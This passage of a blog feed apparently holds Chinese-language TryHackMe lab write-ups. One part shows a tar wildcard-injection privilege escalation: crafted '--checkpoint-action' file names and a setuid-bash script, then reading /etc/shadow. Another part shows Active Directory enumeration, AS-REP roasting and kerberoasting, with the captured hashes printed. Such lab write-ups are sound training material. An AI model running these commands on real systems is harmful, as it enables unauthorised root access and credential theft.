Sun 2026-09-13 03:10:57 UTC    32min Sun 2026-09-13 01:32:58 UTC 1h 5min ago e2scrub_all.timer              e2scrub_all.service
Sun 2026-09-13 05:04:31 UTC 2h 26min Thu 2026-05-14 01:50:51 UTC           - apt-daily.timer                apt-daily.service
Sun 2026-09-13 06:14:28 UTC 3h 36min Sun 2026-09-13 02:27:26 UTC   10min ago apt-daily-upgrade.timer        apt-daily-upgrade.service
Sun 2026-09-13 08:15:50 UTC 5h 37min Wed 2026-05-13 10:40:01 UTC           - man-db.timer                   man-db.service
Sun 2026-09-13 10:47:38 UTC       8h Thu 2026-05-14 03:34:46 UTC           - motd-news.timer                motd-news.service
Mon 2026-09-14 00:00:00 UTC      21h Sun 2026-09-13 01:32:48 UTC 1h 5min ago dpkg-db-backup.timer           dpkg-db-backup.service
Mon 2026-09-14 00:00:00 UTC      21h Sun 2026-09-13 01:32:48 UTC 1h 5min ago logrotate.timer                logrotate.service
Mon 2026-09-14 01:37:40 UTC      22h Sun 2026-09-13 01:37:40 UTC 1h 0min ago update-notifier-download.timer update-notifier-download.service
Mon 2026-09-14 01:47:40 UTC      23h Sun 2026-09-13 01:47:40 UTC   50min ago systemd-tmpfiles-clean.timer   systemd-tmpfiles-clean.service
Sat 2026-09-19 21:14:50 UTC   6 days Wed 2026-05-13 09:25:51 UTC           - update-notifier-motd.timer     update-notifier-motd.service

11 timers listed.
Pass --all to see loaded but inactive timers, too.
</code></pre>
<p><em>process</em>: 也没啥有趣的</p>
<pre><code>voltapp      714     613  0 01:32 ?        00:00:22 /opt/voltlabs-preview/venv/bin/python3 /opt/voltlabs-preview/venv/bin/gunicorn -w 2 -b 0.0.0.0:80 app:app
voltapp      721     613  0 01:32 ?        00:00:22 /opt/voltlabs-preview/venv/bin/python3 /opt/voltlabs-preview/venv/bin/gunicorn -w 2 -b 0.0.0.0:80 app:app
</code></pre>
</li>
<li>
<p><strong>Network</strong>
本机的网络设置:</p>
<pre><code>webdev@coldstart:~$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: ens5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 0a:ff:dd:e8:6a:fd brd ff:ff:ff:ff:ff:ff
    altname enp0s5
    inet 10.64.188.6/18 metric 100 brd 10.64.191.255 scope global dynamic ens5
      valid_lft 2083sec preferred_lft 2083sec
    inet6 fe80::8ff:ddff:fee8:6afd/64 scope link 
      valid_lft forever preferred_lft forever
webdev@coldstart:~$ ss -lntp
State                     Recv-Q                     Send-Q                                         Local Address:Port                                         Peer Address:Port                    Process                    
LISTEN                    0                          4096                                              127.0.0.54:53                                                0.0.0.0:*                                                  
LISTEN                    0                          4096                                                 0.0.0.0:22                                                0.0.0.0:*                                                  
LISTEN                    0                          32                                                   0.0.0.0:21                                                0.0.0.0:*                                                  
LISTEN                    0                          4096                                           127.0.0.53%lo:53                                                0.0.0.0:*                                                  
LISTEN                    0                          2048                                                 0.0.0.0:80                                                0.0.0.0:*                                                  
LISTEN                    0                          4096                                                    [::]:22                                                   [::]:*                                                  
</code></pre>
<p>就一张网卡, 没有有趣的内部端口</p>
</li>
<li>
<p><strong>privfile</strong>
<em>Suid</em>: 没啥有趣的.</p>
<pre><code>webdev@coldstart:~$ find / -type f -perm -04000 -ls 2&gt;/dev/null 
14580     36 -rwsr-xr--   1 root     messagebus         34960 Aug  9  2024 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
18107    336 -rwsr-xr-x   1 root     root              342632 Apr 28 00:29 /usr/lib/openssh/ssh-keysign
518279     20 -rwsr-xr-x   1 root     root               18736 Apr 10 10:57 /usr/lib/polkit-1/polkit-agent-helper-1
 4587     72 -rwsr-xr-x   1 root     root               72792 May 30  2024 /usr/bin/chfn
 8485    272 -rwsr-xr-x   1 root     root              277936 Mar  2  2026 /usr/bin/sudo
 9153     40 -rwsr-xr-x   1 root     root               39296 Mar  6  2026 /usr/bin/umount
 4695     64 -rwsr-xr-x   1 root     root               64152 May 30  2024 /usr/bin/passwd
 4679     76 -rwsr-xr-x   1 root     root               76248 May 30  2024 /usr/bin/gpasswd
 1573     40 -rwsr-xr-x   1 root     root               40664 May 30  2024 /usr/bin/newgrp
 4589     44 -rwsr-xr-x   1 root     root               44760 May 30  2024 /usr/bin/chsh
13682     40 -rwsr-xr-x   1 root     root               39296 Apr  8  2024 /usr/bin/fusermount3
 8197     56 -rwsr-xr-x   1 root     root               55680 Mar  6  2026 /usr/bin/su
 9150     52 -rwsr-xr-x   1 root     root               51584 Mar  6  2026 /usr/bin/mount
...
</code></pre>
<p><em>Cap</em>: 没啥有趣的</p>
<pre><code>webdev@coldstart:~$ getcap -r / 2&gt;/dev/null
/snap/core20/2379/usr/bin/ping cap_net_raw=ep
/snap/core20/2866/usr/bin/ping cap_net_raw=ep
/snap/core22/2411/usr/bin/ping cap_net_raw=ep
/snap/core22/1621/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin,cap_sys_nice=ep
/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_resource=p
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
</code></pre>
</li>
</ol>
<p>:::</p>
<h2>Wildcard inject</h2>
<p>回顾枚举</p>
<ol>
<li><code>voltlabs-backup</code> 使用通配符 <code>*</code> 从 <code>/var/backups/</code> 归档文件</li>
<li><code>webdev</code> 对该目录有写入权限</li>
</ol>
<p>SHELL 有一个特性: ==其会在命令执行前展开通配符并解析其中内容=={.tip}.</p>
<p>这意味着, 如果文件名是合法的参数, 其会被注入到执行的命令中.</p>
<p>根据 <a href="https://gtfobins.org/gtfobins/tar/">GTFOBINS</a> 上方案操作</p>
<pre><code>webdev@coldstart:/tmp$ cat &gt;&gt; e &lt;&lt; 'eof'
&gt; cp /bin/bash /tmp/stackcat
&gt; chown root:root /tmp/stackcat
&gt; chmod +x /tmp/stackcat
&gt; chmod +s /tmp/stackcat
&gt; eof
webdev@coldstart:/opt/backups$ cp /tmp/e .
webdev@coldstart:/opt/backups$ touch -- '--checkpoint=1'
webdev@coldstart:/opt/backups$ touch -- '--checkpoint-action=exec=sh e'
</code></pre>
<p>等待, 并执行:</p>
<pre><code>webdev@coldstart:/opt/backups$ ls  /tmp
e                 systemd-private-4c9d448e83ec49f2aae95fc02501cbd7-polkit.service-kSS5AU            systemd-private-4c9d448e83ec49f2aae95fc02501cbd7-systemd-timesyncd.service-FeXrbn
snap-private-tmp  systemd-private-4c9d448e83ec49f2aae95fc02501cbd7-systemd-logind.service-RBN5Xu    systemd-private-4c9d448e83ec49f2aae95fc02501cbd7-voltlabs-preview.service-6sTw3J
stackcat          systemd-private-4c9d448e83ec49f2aae95fc02501cbd7-systemd-resolved.service-aICSda  test
webdev@coldstart:/opt/backups$ ls -lah /tmp/stackcat
-rwsr-sr-x 1 root root 1.4M Sep 13 03:03 /tmp/stackcat
webdev@coldstart:/opt/backups$ /tmp/stackcat -p
</code></pre>
<h1>root3d!</h1>
<pre><code>stackcat-5.2# whoami
root
stackcat-5.2# ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: ens5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 0a:ff:dd:e8:6a:fd brd ff:ff:ff:ff:ff:ff
    altname enp0s5
    inet 10.64.188.6/18 metric 100 brd 10.64.191.255 scope global dynamic ens5
       valid_lft 3457sec preferred_lft 3457sec
    inet6 fe80::8ff:ddff:fee8:6afd/64 scope link 
       valid_lft forever preferred_lft forever
stackcat-5.2# cat /etc/shadow
...
webdev:$y$j9T$jVc1oZAN6/ESoWnIZA/dZ/$Oc1/KMV/I/dzYnJgFaLSO.ikpjRJAogaQjd0SRr2GE/:20582:0:99999:7:::
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>OperationEndgame-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/operationendgame-thm/operationendgame/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/operationendgame-thm/operationendgame/</id>
    <published>2026-09-11T00:00:00.000Z</published>
    <updated>2026-09-11T00:00:00.000Z</updated>
    <summary>看红传说差点笑死</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<p>Tryhackme 有一个 Operation 系列 box, 按照名字这是最后一台了, 都是很不错的练手 box</p>
<pre><code>PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  domain            syn-ack ttl 128 Simple DNS Plus
80/tcp    open  http              syn-ack ttl 128 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec      syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-09-11 13:23:03Z)
135/tcp   open  msrpc             syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http          syn-ack ttl 128 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:26:00
| Not valid after:  2028-05-12T07:35:59
| MD5:   c249:3bc6:fd31:f2aa:83cb:2774:bc66:9151
| SHA-1: 397a:54df:c1ff:f9fd:57e4:a944:00e8:cfdb:6e3a:972b
| -----BEGIN CERTIFICATE-----
| MIIDaTCCAlGgAwIBAgIQUiXALddQ7bNA6YS8dfCQKTANBgkqhkiG9w0BAQsFADBH
| MRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0xGTAX
| BgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjMwNTEyMDcyNjAwWhcNMjgwNTEy
| MDczNTU5WjBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZ
| FgN0aG0xGTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC/NNh6IN5jNgejLjqq9/RVDR42kxE0UZvnW6cB1LNb
| 0c4GyNmA1h+oLDpz1DonC3Yhp9XPQJIj4ejN1ErCQFMAxW4Xcd/Gt/LSCjdBHgmR
| R8wItUOpOoXkQtVRUE4I7vlWzxBuCVo644NaNzbfqVj7M1/nCBjn/PPd2fX3etSX
| EsaI6bYcdmKRimC/94UP8qTs6Z+KGasXUmb7Sj8vscncY8lFLe9qREuiRrom5Q8A
| NySO4t8mtmqIHrBb8zTTZ9N/HxEOPDafCSTOjRhDVsOXVuWllTJujjSu+jJlBiF/
| aiXM7mOmsxH1rqCUK9mhZFSf/OhvgsvAq66sTBs1huE1AgMBAAGjUTBPMAsGA1Ud
| DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBQJcLfjxXJyk7BxDCNC
| pJb9vgIdEzAQBgkrBgEEAYI3FQEEAwIBADANBgkqhkiG9w0BAQsFAAOCAQEAmnUK
| Wj9AoBc2fuoVml4Orlg+ce7x+1IBTpqeKaobBx/ez+i5mV2U45MgPHPwjHzf15bn
| 0BnYpJUhlEljx7+voM+pfP/9Q21v5iXjgIcH9FLau2nqhcQOnttNj8I4aoDr5rRG
| fJJv+hAuNXxr/Fy5M7oghCpNqxseEU9OcgIPRHp6X/8bTtEYWaHnD3GS6uUR2jai
| PhReAcCPTbRwMRA3KsGRaBF3+PsIOL0JtCR+QGfOugPhUJFOU7w0dwbFmzfRcgKw
| bJhEy3o0FL5aqKVC823QJE7LosyLdtAqtZY7OgtT0Do7RZzdsZ1If0JmYmHTSRVz
| 8CvPpcCDp68aiTtqgA==
|_-----END CERTIFICATE-----
|_ssl-date: 2026-09-11T13:23:46+00:00; -1s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?     syn-ack ttl 128
464/tcp   open  kpasswd5?         syn-ack ttl 128
593/tcp   open  ncacn_http        syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 128
3268/tcp  open  ldap              syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 128
3389/tcp  open  ms-wbt-server     syn-ack ttl 128 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: thm.local
|   DNS_Computer_Name: ad.thm.local
|   Product_Version: 10.0.17763
|_  System_Time: 2026-09-11T13:23:38+00:00
|_ssl-date: 2026-09-11T13:23:46+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.thm.local
| Issuer: commonName=ad.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-09-10T13:21:21
| Not valid after:  2027-03-12T13:21:21
| MD5:   7af0:15c0:7c5d:9197:a6be:7328:cb85:e84a
| SHA-1: d519:1cb4:582a:9984:1c69:e88c:a9dd:f14b:9d0c:28b8
| -----BEGIN CERTIFICATE-----
| MIIC3DCCAcSgAwIBAgIQGVZo5lAH2qVDaHrhFJEBSjANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxhZC50aG0ubG9jYWwwHhcNMjYwOTEwMTMyMTIxWhcNMjcwMzEy
| MTMyMTIxWjAXMRUwEwYDVQQDEwxhZC50aG0ubG9jYWwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCxP0gZG6p+PWQs0yP7oShFAN49aIUUhFB+F061DLnl
| eAj2hGzoHQUnEEx/z1XEWSiO5KWnqItfwgyalmEoErAvSLGFBU5Ft3GXpdCNs3Mx
| +AFKC0pxKvy+ZrbDCK2X1yNcicMGup2cxiRusJ2HjGt9t88feYzETjpqpBIi04zt
| 2qriCMlyng5kNn5XXF0pGy1b+D3r9on5iFV0Ft2rD+wG4KcT7YrpJSvRM+PUGd8e
| K6ZRSbFIZVe5PT5WTXZxbVtnuhnLmbm6PkoEyPgRUYw2zJPPs3WbxZ8K9OsDvDa6
| YE7LmBbRvZ87G+iUDvonfLWj4kY7S4fM/T5CGRZKOwx1AgMBAAGjJDAiMBMGA1Ud
| JQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEA
| frZEu+z6xix0bUEeTIP0hBhBqLalMkIpXYUFoUC1VNQKg7+6DLnlRaEwJZR1mtEQ
| w6N1+VBJLULGgRmy+Xk8W4mBnyJXns2XQ2anQUzyREnwm9Taa3X4787xOg27r4xv
| 4kPFWT5Np9+y13VlQ1HCRoXOu4EV9J77dSCnmKey1q9e5LqDb6avZ1L1ipLFhK1M
| VrT103rFr9/07Evf49Dxc1XfHjhNUjdC4F6a6eyesqhZhxHz8Vew6Ip5DpadctRk
| Lw/dhOvE5tt7eAfuhKnVjYny1H4ibKwU0wiliUGcDUnuw3KWsfCLBT4dH3RJ6UBn
| z62TT3vDHI0rzTC0ZpXsQA==
|_-----END CERTIFICATE-----
7680/tcp  open  pando-pub?        syn-ack ttl 128
9389/tcp  open  mc-nmf            syn-ack ttl 128 .NET Message Framing
47001/tcp open  http              syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-09-11T13:23:39
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 42161/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52658/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38919/udp): CLEAN (Timeout)
|   Check 4 (port 28514/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
</code></pre>
<p>标准的 DC 端口分布, TTL 均为 <code>28</code>, 与一跳后预期符合, 一些信息:</p>
<ol>
<li>hostname: ad.thm.local</li>
<li>domain: thm.local</li>
</ol>
<p>证书前名为主机名, 自签名证书, 无 ADCS 存在信息; 时钟偏差为 1s. 以及这次真没开 winrm:</p>
<pre><code>nmap -sT -p5985 10.65.136.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-09-11 13:23 UTC
Nmap scan report for AD.thm.local (10.65.136.134)
Host is up (0.00026s latency).

PORT     STATE  SERVICE
5985/tcp closed wsman

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
</code></pre>
<h2>smb</h2>
<p>Windows Server 2019, 可以以 guest 身份访问 smb 并列出共享, 可读取 <code>IPC$</code></p>
<pre><code>root@ip-10-65-111-239:~/wrk# nxc smb thm.local -u guest -p '' --shares
SMB         10.65.136.134   445    AD               [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.65.136.134   445    AD               [+] thm.local\guest: 
SMB         10.65.136.134   445    AD               [*] Enumerated shares
SMB         10.65.136.134   445    AD               Share           Permissions     Remark
SMB         10.65.136.134   445    AD               -----           -----------     ------
SMB         10.65.136.134   445    AD               ADMIN$                          Remote Admin
SMB         10.65.136.134   445    AD               C$                              Default share
SMB         10.65.136.134   445    AD               IPC$            READ            Remote IPC
SMB         10.65.136.134   445    AD               NETLOGON                        Logon server share 
SMB         10.65.136.134   445    AD               SYSVOL                          Logon server share
</code></pre>
<h3>RID brute</h3>
<p>老生常谈的标准操作:</p>
<pre><code>root@ip-10-65-111-239:~/wrk# nxc smb thm.local -u guest -p '' --rid-brute 2000 &gt; rid
root@ip-10-65-111-239:~/wrk# cat rid |grep 'TypeUser'|awk -F 'THM' '{print $2}'|awk -F '\' '{print $2}'|awk '{print $1}' &gt; users
</code></pre>
<h2>ldap</h2>
<pre><code>root@ip-10-65-111-239:~/wrk# ldapsearch -x -H ldap://10.64.152.237
# extended LDIF
#
# LDAPv3
# base &lt;&gt; (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 32 No such object
text: 0000208D: NameErr: DSID-03100220, problem 2001 (NO_OBJECT), data 0, best 
 match of:
	''


# numResponses: 1
</code></pre>
<h1>roasting</h1>
<h2>asrep roasting</h2>
<p>一份用户名列表, 考虑 asrep-roasting:</p>
<pre><code>root@ip-10-65-111-239:~/wrk# GetNPUsers.py -usersfile ./users -request thm.local/
$krb5asrep$23$SHELLEY_BEARD@THM.LOCAL:b3e28443014c5e90b07978b484b3d0fc$3a8dc1c4c2a59a609e075d6646d756cfca3102efcc00d5c0139d175668cb71a92d287e9bf67737c865ed809a3566c68a23ddb92fa084ce61fdc0d33cb1970cd66b176a119701b188ee3b5f62941af4931a60eb8b52a6f79fde63321be4b60752c54ecacbef4b4ba0330531fb68f395322a0d825c182df93472153dc060d32fc82eab4c85de5687a1e3fecbd03eb9776f350cca7e0f7eb88332c65bd7b84f1beeae7328906305416e43aab24cc74ce9229524e78a3f00cede305519c5e4aa1c46afeffd7944ffaa5f5e93e14ce1388c58540e23007b02ddc8cee4ee599648a9d10bd3a234164e
$krb5asrep$23$ISIAH_WALKER@THM.LOCAL:50095ca60839aa93372691d1b82039bc$02a6727359b03e594d186791f92954b1382d54f90fe4fdbc0b561df277f9502f9d2cc4f9e9578815e78d5f6f718648cd6a4b47b21de0d7ac7a4008e97ed6ececa77977498c19d415bd4f89a779f5271a877f20b70ca6cbbd08c1f8ce75fc247665063073bda486b5bb82fb31f7345050772ae406ae685485d3e4d2a4ed773b55ca7deb2b5679d588cbbf47b45e71b6c0c7fdfe5271d3c30e5f82f3521343db6291a29aec1bade9db78f4af4081fc0ddc0fc4ab20e08999f215249da45073dc436411858cf5d81002d803abda55069b6a1173dac0d1984e5465e288652dc1eafb7ee413fe5932
$krb5asrep$23$QUEEN_GARNER@THM.LOCAL:a3a8ea7efb321f6377fc4e7e32573c06$b6c405e4d012f338961b186003de847fd2dce645a7b9700e97c4139891ea2c0cfa319ee12a13904769dda2ab320c908280499d27cbea913a67cf47fc7e1087cd575256c29b83d4b5545e91023a5d1dfac07445a5038a357199df6d577af02c492e8773503158142c46388745155963ac1ca146e5c78d3461b1e96b62b8d5a3da70a6d8194112493d3d19c84b7cde2a960a6d5231d1ea748549e2a795b2ed8b16a566380744c5b87c10fcaa9f5d11b2b7a0a61901ab0fc94c77742f43d9417924a903f6af34852a102a4de911bb30e86a23971e6d987a93d8b12930122f7292d12847c30be3f4
$krb5asrep$23$PHYLLIS_MCCOY@THM.LOCAL:e8b23ed2765ea5a41f610d2bb3e0dc16$1ebd88a016556a2406da7f58ef42f406dbf2d8660c85a9ed9f06c98eb0cc55812f0bc36e3d31a57efdc02e4236fb8a244bbb74f27cf84b1899c60ff471c4904f428f718808da2c1b961135f5c65d9523ff0f7a8b09520d1c8a249a98591033c67f01dd5892932c957ee40994e91dec424fed6f76a24d8762809a3b5e8db67bcb3d4869fe98417f7c5606d0930de25618201bac01d44a6f895d53a48fb1a77cb622b883687c2dd4c70ec96ccd2cb2d10814b010aa5ca4c4d2914044a1468b84d3bd74c32630ca06b757ccba55b8d98df0018bc58bfa3e021bb57652a95f85400fab2084d1fb17
$krb5asrep$23$MAXINE_FREEMAN@THM.LOCAL:6553a2e3393f14af9b81165fc509375c$5b2058359ecf23eebf9980a52e6a9d355d6ed7d3e852556b7c702aae50a9726eb7ceb0932a6d9182d060c7ae6282e1de1e8107488b2f1ffe510805e4678cf30ff6f4b5be030798de9ecd8b3214147688612ee8e7a3045cbb0dd03082e649a9ddfddb139823655d8083e36d16a2c1ac2459652ac828895239e8eefe17789fe2f23c4699f80969c19819d115c200ecbb46e421b655dee299c18933fe5eff0dcaab9b870fe5609227f2ec19731094ecac88c6aa3ad7df3b4e3041dd8c3e888216d4cb65e88cfaea07a86c960b0e5e0e8376874ecd340744dc9ea8344ebfabe4945c822e17e311db
</code></pre>
<p>尝试爆破, 但没一个成功:</p>
<pre><code>Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: ./h
Time.Started.....: Fri Sep 11 21:48:20 2026 (4 secs)
Time.Estimated...: Fri Sep 11 21:48:24 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/opt/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 20804.2 kH/s (0.59ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 0/5 (0.00%) Digests (total), 0/5 (0.00%) Digests (new), 0/5 (0.00%) Salts
Progress.........: 71721920/71721920 (100.00%)
Rejected.........: 0/71721920 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#02..: Salt:4 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: (Mouton -&gt; $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.SMC.: Fan0: 25%, Fan1: 25%
Hardware.Mon.#02.: Util: 95% Pwr:1113mW
</code></pre>
<p>==难道烧烤就到此为止了吗?==</p>
<h2>kerberoasting with DONT_REQ_PREAUTH</h2>
<p><a href="https://www.semperis.com/blog/new-attack-paths-as-requested-sts/">该技术</a> 在 2022 年末提出, 有些出乎意料的是很少看到 box 设置与该技术有关的环节</p>
<pre><code>GetUserSPNs.py -no-preauth SHELLEY_BEARD -request -usersfile users thm.local/
$krb5tgs$18$krbtgt$THM.LOCAL$*krbtgt*$f5dcfb954281fd779444eeac$d5ae446007877e04bd3f7fa919b07b3b390d3d5748637e94d119d8a9db0ca542ff75daa654c791fee57975a5e79992cab4622f57735ebbac63b2ab9338b87333843603b41536fd7b7cb48c47f7e992011d67e514b97bd036016bd88de620c45d920899c748abeb12eb521587e2357e9f2d3169bb66086adca5ee060d7884e6f23f4d4ba4e5ebf1cc5a2467d530db5150d394fd424d0119a872b2ee02ad2f6812a30dde9a455f302df4474bf057ca5c5214a724210b9c2c13cb25ecc3fb9f2499f39a89a89976ed696a1516d2c0110e64760fc26897d65c49afbe0274b2e8f949bb3f7ec3d2838113dda465546509f59daa4f25409fa486a880851a25d58c74c75e6b84ce38f3998cb86fcb6101db1616570b27a1aac0b3ea19a088a709ba41bc0230e79c0583056610d3e3a5ecebf8f986b249883b80b881daad4701091fa388901094fa4c8777b6b62a8c8700cecdd1f244a09fc8475de2907f6f8e0bd2c9ee55faf5a4cf139cb32b0dd89628564c5a46fec650e29bc213fe777391f1544d69f1c965921fd9df32deef74abb1c43f03020d71ec300180f7e3e48e072838a95138b66c45886a27d460f8a7401ac28bc4e0fdbe6405b3af188f6c012fdd3a5e6d6c30a8c840a8dc40071d0d4567fb9a9127a4107646daaebeeaeaf6e6bccb468609495c2db8a471ce48e85d82ca8876f9a9b9dc18a4d654ae9c52fd810660243389279ff598987a6705991f3deacd438d235fd47698d078b8386a544c74fd033b860c9ae17f88b0f00d8250dfd7a19ade29f88ff0c856e457c36bf9c4c7b5ae1ec22945315f16eb2a3973f7a5be3b14f4b5caf770d3d6e2a5135467f3772a13c33ae0247bd6099184d49137699cb610153f674bf22343f4da26af35a2df8c56a465cf02c00761757476deb0d7fe3529d74aec2313b718e20e277679b49f9942b014a46b34d335c84481f03713ac23910ac940346cbf208397a07d333cf3e5947dcd3152fddc5eef6562c3686adb617b9174dc3d6bb802d7b42d22cd34396f31e4e977f556d0222b6c607e9d84959d948bd13d31c3f4704c7dc3080ca28d811a3837a0f7071354d4d0849223f608f0418ee057821ed141ce5d5e2a7b1e26c184cebd25c7d822d23a5f522f7cdde4480f9f223ec658fe04c018de7fb7540d871ba5659cf7b2fbfcd797bf6d276a7405162dc3f8342a484085b731263866150b655d6fc59f9564bbe8e7fcc744c07f140bc4842ce5ff079291ff3785104b71d67df59baa7f95e8318f522177dac7e2ae9f93670e0c16fbd17da7660e3df3cea23e7582f8ed4b35242251e7fa6f369d264eaf9004d6bc85d7dbea9643c582a655ae17faca5bae811636b78eb73a7be9d76fcf4ab296b32fa6d6ba013d48680e603e166c75d366674f8f13816618b81a3fc859886d43ac6ba59047ecd22cd35dd3fc33415bc12e8e5624916c58c1d6c6106cb86e335a444080f44bcf2d288a2c8560ef0a99014ef7155547f9dfe62d6fcdad2a912ab754816c37afecb8c998a34db4d16877bebc36384f56b42c2fd942656a8b53a938de56e41153e960af549527d4
$krb5tgs$18$AD$$THM.LOCAL$*AD$*$5df6cd1d91265fa0dd15744a$0e9ccd96254e17be98273c1b2494f93d8bfef36a0cb5f63880a1db81cdc67e00d5801af767f07729dee24a2084e47583d0c1e53b3aa6a2bc3cf5859d17d0eec2150b05afac41c45720d32ae073b3f9ce19af520ffa64f8738c1b7e57da89ae5ec32afe65b85165eabde923fa8b8c06869b96821a1f81f48668949db84f62f0052ff0c08c796aa8edb2f7973e4c966a798c166e6492d290d67d2b69b37a6b209322df389975a93abba11c52d916ff691b86cca3b0650e337b4d469770d98e8826995aa4ed7340d9568c744d6c08884b22b13d1b0d3eeca94374461d5352bc55d45f95b61f2bfe6c85591c3bac5f47115123493ce48d8ea1bfc33128d7a7b383763fbd77e08840f96edbb5ed8d84f004e9de2cfb9ad33b42a5e32816dd956eb48525e9b245fd3700ce82f5375e90af28cfce82e4f9bc7c2ac5e9084c94983c5ac5c25ee78757a028ab7d32a3395eba6a057c365da55e4dd6906255d3b2ae96b99976fc096c6b5b5fd314eb9c84fa28efd0ff5cde2201ec8828312e8e7498f1eede06dda4b7bddd52f075d22c9312e0e1e628060e640fd12e1aa41939ed690b1fdfc70b3c36498729d19c53d24dd41682816428db23fe22cbe28b89e1b43654ebb23a811bf312a5b6ae3f9d6e51d345eb79c90d4d6f2e8c5088356d7354b73f661854317fb2d6a6274ca60e59aadb25b17eb5d4c241d8d74e435d3b40cb4a9b586d2be9098753747b0920ea08cf0275a47622d6b1afb759c26633d9ba24f48b910b0dfb98a8bb12d70d7bd9dc091c9b430c8264aff80fbe79346fbcf2dc4d858a49673dcb808d6ed3958d49a1ca92356d1